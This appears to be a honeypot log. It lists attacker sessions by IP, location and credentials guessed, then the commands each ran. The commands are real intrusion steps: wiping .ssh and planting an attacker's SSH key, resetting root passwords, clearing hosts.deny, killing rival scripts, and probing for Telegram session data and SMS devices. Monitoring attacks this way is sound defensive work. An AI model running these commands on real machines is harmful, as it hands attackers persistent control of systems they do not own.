$ Enter new UNIX password:
$ echo "tomcat123\nOzcwanL3xW3k\nOzcwanL3xW3k\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ manic_harbor_root (165.154.6.26) โ€” Hong Kong, Hong Kong ยท 1 session ยท 19 cmds
2026-05-21 08:40 EDT ยท as root/admin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:tIRLszGOu7j4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ nocturnal_zubr_root (85.158.57.3) โ€” Warsaw, Poland ยท 1 session ยท 19 cmds
2026-05-21 08:40 EDT ยท as root/admin
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv... โ†’ cat /proc/cpuinfo | grep name | wc
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:lUqYgo1FX6Wk"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ manic_windmill_sol (45.156.87.69) โ€” Eygelshoven, The Netherlands ยท 32 sessions ยท 32 cmds
2026-05-21 07:50 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 32x across 32 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ velvet_gouda_root (45.114.63.93) โ€” Amsterdam, The Netherlands ยท 19 sessions ยท 19 cmds
2026-05-21 03:50 EDT ยท as admin/admin, admin/password, deploy/deploy
Ran uname 19x across 19 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—19
๐ŸŽญ silent_lantern_root_231 (116.177.174.231) โ€” Jinrongjie, China ยท 1 session ยท 1 cmd
2026-05-21 02:55 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ manic_harbor_root_18 (144.48.243.18) โ€” Tsim Sha Tsui, Hong Kong ยท 1 session ยท 19 cmds
2026-05-21 02:18 EDT ยท as root/toor
cd ~; chattr -ia .ssh โ†’ rm -rf .ssh โ†’ mkdir .ssh โ†’ echo "ssh-rsa..." โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo "root:VtRCmXjDDuIX"|chpasswd|bash โ†’ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:VtRCmXjDDuIX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ rusty_sensei_root (92.113.142.203) โ€” Tokyo, Japan ยท 1 session ยท 19 cmds
2026-05-21 02:16 EDT ยท as root/toor
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:qBVdF3AhBEJm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ brazen_junk_root (101.36.122.139) โ€” Hong Kong, Hong Kong ยท 1 session ยท 20 cmds
2026-05-21 01:17 EDT ยท as test/123456
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "123456\nEzQQAeLVTd1c\nEzQQAeLVTd1c"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nEzQQAeLVTd1c\nEzQQAeLVTd1c\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ haywire_liberty_root_83 (204.10.161.83) โ€” Kansas City, United States ยท 1 session ยท 20 cmds
2026-05-21 00:59 EDT ยท as test/123456
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "123456\nwebxnEirMIeL\nwebxnEirMIeL"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nwebxnEirMIeL\nwebxnEirMIeL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ nocturnal_scone_root (45.89.63.39) โ€” Coventry, United Kingdom ยท 2 sessions ยท 39 cmds
2026-05-20 23:39 EDT ยท as guest/guest, root/password
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l ร—2
โ†ณ CPU profiling
$ echo "root:DR3KIH7XvGLc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ร—2
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ร—2
$ ls -lh $(which ls) ร—2
$ which ls ร—2
$ crontab -l ร—2
โ†ณ persistence setup
$ w ร—2
โ†ณ logged-in users check
$ uname -m ร—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l ร—2
โ†ณ CPU profiling
$ top ร—2
โ†ณ process monitoring
$ uname ร—2
โ†ณ OS identification
$ uname -a ร—2
โ†ณ OS/kernel identification
$ whoami ร—2
โ†ณ privilege check
$ lscpu | grep Model ร—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ร—2
$ echo -e "guest\nQWTsqU8mxXla\nQWTsqU8mxXla"|passwd|bash
$ Enter new UNIX password:
$ echo "guest\nQWTsqU8mxXla\nQWTsqU8mxXla\n"|passwd
๐ŸŽญ zealous_hawker_root (15.235.140.136) โ€” Singapore, Singapore ยท 2 sessions ยท 39 cmds
2026-05-20 23:34 EDT ยท as guest/guest, root/password
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l ร—2
โ†ณ CPU profiling
$ echo "root:0Bt1PbS6knZ9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ร—2
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ร—2
$ ls -lh $(which ls) ร—2
$ which ls ร—2
$ crontab -l ร—2
โ†ณ persistence setup
$ w ร—2
โ†ณ logged-in users check
$ uname -m ร—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l ร—2
โ†ณ CPU profiling
$ top ร—2
โ†ณ process monitoring
$ uname ร—2
โ†ณ OS identification
$ uname -a ร—2
โ†ณ OS/kernel identification
$ whoami ร—2
โ†ณ privilege check
$ lscpu | grep Model ร—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ร—2
$ echo -e "guest\nvFEhuAIdPihJ\nvFEhuAIdPihJ"|passwd|bash
$ Enter new UNIX password:
$ echo "guest\nvFEhuAIdPihJ\nvFEhuAIdPihJ\n"|passwd
๐ŸŽญ sneaky_bibimbap_root (58.226.230.112) โ€” Buk-gu, South Korea ยท 1 session ยท 9 cmds
2026-05-20 23:19 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ hollow_hawker_db (47.84.12.247) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-05-20 22:31 EDT ยท as oracle/oracle123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ aloof_merlion_root (207.46.224.89) โ€” Singapore, Singapore ยท 19 sessions ยท 19 cmds
2026-05-20 15:49 EDT ยท as root/1234, root/123456, root/12345678
history snooping โ†’ OS/kernel identification โ†’ privilege check โ†’ hostname discovery
$ mount | head -5
$ history | tail -5
โ†ณ history snooping
$ uname -a ร—6
โ†ณ OS/kernel identification
$ ps aux | head -10 ร—2
$ netstat -tulpn | head -10
$ whoami ร—3
โ†ณ privilege check
$ pwd ร—2
$ ls -la /
$ ssh -V
$ hostname
โ†ณ hostname discovery
๐ŸŽญ grumpy_hanbok_root_62 (211.37.174.62) โ€” Seongnam-si, South Korea ยท 1 session ยท 2 cmds
2026-05-20 20:15 EDT ยท as oracle/password
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ stoic_harbor_root (61.92.58.210) โ€” Kwai Chung, Hong Kong ยท 1 session ยท 9 cmds
2026-05-20 19:55 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ lurking_burger_root_186 (74.208.97.186) โ€” Kansas City, United States ยท 1 session ยท 2 cmds
2026-05-20 19:43 EDT ยท as oracle/123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ jittery_star_root (47.252.87.74) โ€” Charlottesville, United States ยท 2 sessions ยท 2 cmds
2026-05-18 15:09 EDT ยท as admin/admin, test/123456
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ weary_wok_root_27 (39.105.217.27) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-05-20 18:21 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ sullen_crumpet_root (35.189.106.162) โ€” London, United Kingdom ยท 1 session ยท 1 cmd
2026-05-20 17:34 EDT ยท as root/root
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ sullen_bike_root (193.32.162.151) โ€” Amsterdam, The Netherlands ยท 100 sessions ยท 100 cmds
2026-05-09 02:57 EDT ยท as admin/admin, admin/admin123, admin/password
Ran uname 79x across 79 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—100
โ†ณ obfuscated system check
๐ŸŽญ molten_sultan_root (185.103.202.198) โ€” BeyoฤŸlu, Turkey ยท 1 session ยท 2 cmds
2026-05-20 15:14 EDT ยท as oracle/Welcome1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_pho_root (14.224.213.222) โ€” Hanoi, Vietnam ยท 1 session ยท 20 cmds
2026-05-20 15:13 EDT ยท as ubuntu/password
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\nG6u6Y66qztVF\nG6u6Y66qztVF"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nG6u6Y66qztVF\nG6u6Y66qztVF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ grumpy_sundarban_root (103.148.213.74) โ€” Bogra, Bangladesh ยท 1 session ยท 1 cmd
2026-05-20 14:31 EDT ยท as root/123456
ssh
$ ssh -V
